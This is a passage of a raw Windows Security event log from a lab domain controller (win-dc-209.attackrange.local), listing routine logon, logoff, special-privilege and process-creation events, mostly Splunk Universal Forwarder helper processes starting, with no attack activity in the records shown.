ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263751
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263750
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752F8C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263749
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752FD4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263748
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7530AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51477
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263747
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7530AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263752
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263754
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263753
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa8c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263755
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263756
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263758
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a9c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263757
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:24:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263759
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7530AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:34 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263760
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74A49B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263763
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x756A66
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263762
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x756A66
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51488
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:24:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263761
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x756A66
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263765
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1884
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263764
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263766
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1500
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263767
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263768
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263770
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263769
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1548
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:25:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263771
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x752E7B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263774
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75B50A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:25:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
